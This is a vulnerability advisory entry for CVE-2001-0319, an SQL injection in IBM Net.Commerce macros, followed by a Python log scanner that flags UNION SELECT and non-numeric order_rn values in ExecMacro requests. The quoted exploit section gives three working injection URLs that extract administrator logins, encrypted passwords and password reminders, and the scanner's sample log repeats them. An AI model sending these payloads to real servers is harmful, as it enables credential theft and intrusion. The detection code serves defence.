IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability

Vulnerability ID: 1106198
Vulnerability type: SQL injection
Published: 2001-02-05
Updated: 2005-05-02
CVE ID: CVE-2001-0319
CNNVD ID: CNNVD-200105-058
Platform: Multiple
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/20618
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-058
|Vulnerability details
Net.Commerce is a component of IBM's WebSphere. It offers a set of general-purpose features that make electronic commerce easier, and its performance and reliability are distinctive. The macros it supports by default do not properly check user input, so a remote attacker can use SQL injection to execute arbitrary shell commands with the privileges of the DB2INST1 account. IBM has fixed the vulnerable macros shipped with Net.Commerce 3.2 and WebSphere Commerce Suite 4.1, but user-defined macros may contain the same flaw. WebSphere Commerce Suite 5.1 is not affected, since it does not use Net.Data macros.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/2350/info

IBM's Net.Commerce ecommerce platform supports macros which, by default, do not properly validate user-supplied input in requests. A carefully formed request to a vulnerable script can cause the server to disclose sensitive system information, including the results of arbitrary queries against the Net.Commerce database. This can allow an attacker to obtain an elevation of privileges to that of the DB2INST1 account, and potentially issue arbitrary shell commands as the DB2INST1 user.

IBM fixed the vulnerable macros they ship with the product in Net.Commerce Versions 3.2 and WebSphere Commerce Suite 4.1. Custom macros created by the user may be vulnerable to this type of attack. WebSphere Commerce Suite Version 5.1 is not vulnerable at all as it does not use Net.Data macros. 

To obtain the administrator accounts use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

To obtain the encrypted passwords use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

To obtain the password reminders use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

"orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.

It may also be possible to query other databases.
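As an added example (not from the advisory, exploit-db or IBM), the following Python script applies the two defensive checks the advisory implies to web server access logs: order_rn is an order reference number and should be purely numeric, and a UNION SELECT inside any parameter of an ExecMacro request is an injection attempt that should be flagged. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Common Log Format). The first two have
# the request shape described in the advisory; the third is a benign lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Feb/2001:10:12:01 +0000] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A'; HTTP/1.0" 200 2311
10.0.0.5 - - [05/Feb/2001:10:12:09 +0000] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+UNION%20SELECT+shlpswd+as+mestname,0+from+shopper HTTP/1.0" 200 1874
10.0.0.9 - - [05/Feb/2001:10:13:44 +0000] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=12345 HTTP/1.0" 200 5120
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)'
)
# UNION [ALL] SELECT with whitespace or comment noise between the keywords.
UNION_RE = re.compile(r'\bunion\b[\s/*]+(?:all\s+)?select\b', re.IGNORECASE)

def parse_clf(line):
    """Split one CLF line into its fields; returns None for unparsable lines."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None

def order_rn_is_valid(value):
    """Input check a macro should apply: an order reference number is digits only."""
    return value.isdigit()

def flag_request(url):
    """Return the reasons an ExecMacro request looks like SQL injection (empty if clean)."""
    parts = urlsplit(url)
    if "/ExecMacro/" not in parts.path:
        return []
    reasons = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)  # catches a second layer of URL encoding
            if UNION_RE.search(decoded):
                reasons.append(f"{name}: UNION SELECT in value")
            if name == "order_rn" and not order_rn_is_valid(decoded):
                reasons.append(f"{name}: non-numeric value {decoded!r}")
    return reasons

def scan_log(text):
    """Yield (client ip, url, reasons) for every flagged request in the log text."""
    hits = []
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        reasons = flag_request(rec["url"])
        if reasons:
            hits.append((rec["ip"], rec["url"], reasons))
    return hits

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(ip, url, "; ".join(reasons))
```

The numeric check is the one that removes the flaw: a macro that rejects a non-numeric order_rn before building its query never reaches the UNION.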
|References

Source: BID
Name: 2350
Link: http://www.securityfocus.com/bid/2350

Source: www-4.ibm.com
Link: http://www-4.ibm.com/software/webservers/commerce/netcomletter.html

Source: BUGTRAQ
Name: 20010205IBMNetCommerceSecurity
Link: http://archives.neohapsis.com/archives/bugtraq/2001-02/0072.html

Source: XF
Name: ibm-netcommerce-reveal-information(6067)
Link: http://xforce.iss.net/xforce/xfdb/6067
